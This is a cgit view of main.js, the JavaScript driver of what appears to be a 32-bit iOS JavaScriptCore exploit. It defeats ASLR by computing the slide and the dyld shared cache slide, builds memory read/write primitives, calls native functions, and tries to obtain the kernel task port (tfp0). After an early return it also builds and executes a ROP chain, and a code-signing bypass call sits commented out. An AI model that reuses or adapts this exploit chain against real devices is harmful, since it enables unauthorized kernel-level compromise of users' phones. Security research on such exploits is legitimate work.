summaryrefslogtreecommitdiff
path: root/src/js/main.js
blob: 75d730d0a70ece9219f5c5ce0a8f46f384d52260 (plain) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172

/*
 *  november 24th 2021
 *  [3:16 PM] spv: spice confuses the shit out of me, so i'm prolly not smart enough to implement it anyway
 *
 *  ohai
 */

var MAX_SLIDE = 0x3;
var MIN_SLIDE = 0x1;

var ARM_THREAD_STATE_COUNT = 0x11;
var ARM_THREAD_STATE = 0x1;
var LOG_SYSLOG = 0x28;

var PROT_READ = 0x1;
var PROT_WRITE = 0x2;
var PROT_EXEC = 0x4;

var MAP_PRIVATE = 0x2;
var MAP_ANON = 0x1000;

var victim = {a: 13.37};

if (0) {
/*
 *  leftover shit from jsc_fun, used to be using `log`
 */
try {
	puts("we out here in jsc");
} catch (e) {
	/*
	 *  we don't have puts. :(
	 */

	puts = function (){};
}
}

var JSStringCreateWithUTF8CString = 0x239f9d0d;
var JSObjectGetProperty = 0x239fa411;
var JSContextGetGlobalObject = 0x239f8dfd;

function main() {
	/*
	 *  get slide and calculate slid base
	 *  remember, 32-bit *OS defaults to 0x4000 for the unslid base for exec's
	 * 
	 *  so, take the slide, shift it by 12 bits (aslr is calc'd by taking a
	 *  random byte and shifting it 12 bits, in this case the page size, 4096
	 *  (0x1000) bytes), and add it to the unslid base.
	 */

	slide = get_our_slide();
	base = 0x4000 + (slide << 12);
	slid = (slide << 12);

	init_sptr_heap();

	scall("printf", "%x %x %x %x\n", 0x41, 0x42, 0x43, 0x44);

	puts("we out here");
	puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");

	printf("slide=0x%x\n", slide);
	printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
	printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
	printf("*(uint32_t*)base = 0x%x\n", read_u32(base));

	var dyld_shc_slide = get_dyld_shc_slide();

	sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
	sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;

	prep_shit();

	large_buf[0] = 0x41424344;
	printf("%x\n", read_u32(large_buf_ptr));

	setup_fancy_rw();

//	csbypass();

//	return;


	printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));

//return;
	var tfp0 = get_kernel_task();
	
	printf("tfp0=%x\n", tfp0);
	
	return;

	printf("dead?\n");
	var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
	printf("dead? %x\n", string_ref);
	var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
	printf("dead? %x\n", global_object);
	var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
	printf("dead?\n");

	printf("%x\n", jsobj_addr);
//	printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
	victim.target = parent;
	printf("%x\n", read_u32(jsobj_addr + 0x18));
//	printf("%s\n", prim_dump_u32(read_buf(jsobj_addr - 0x10, 0x60), jsobj_addr - 0x10));
//	printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));

	/*
	    UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"ROFL" 
                                                    message:@"Dee dee doo doo." 
                                                    delegate:self 
                                                    cancelButtonTitle:@"OK" 
                                                    otherButtonTitles:nil];
		[alert show];
	 */

	return;

	var rop_buf = new Array();
	var nop = (0x781a | 1) + slid;
	var zero_arr = [].slice.call(u32_to_u8x4(0));
	var nop_arr = [].slice.call(u32_to_u8x4(nop));
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(nop);
	for (var i = 0; i < 0x40000; i++) {
		rop_buf.push(0);
		rop_buf.push(0);
		rop_buf.push(0);
		rop_buf.push(0);
		rop_buf.push(nop);
		if (i % 0x1000 == 0) {
			printf("%x\n", i);
		}
	}
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0);
	rop_buf.push(0x41414141);

	printf("gen'd buf\n");

//	printf("%s\n", rop_buf[0].toString(16));
	
	printf("exec'ing\n");
	exec_rop(rop_buf);
	printf("done\n");

//	var tfp0 = get_kernel_task();

//	printf("tfp0=%x\n", tfp0);

	return;

	var i = 0;
	while (true) {
		syslog(LOG_SYSLOG, "get rekt from jsc %d (slide=%x)\n", i, slide);
		sleep(0);
		i++;
	}

	printf("still alive\n");
};
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:47:10 +0000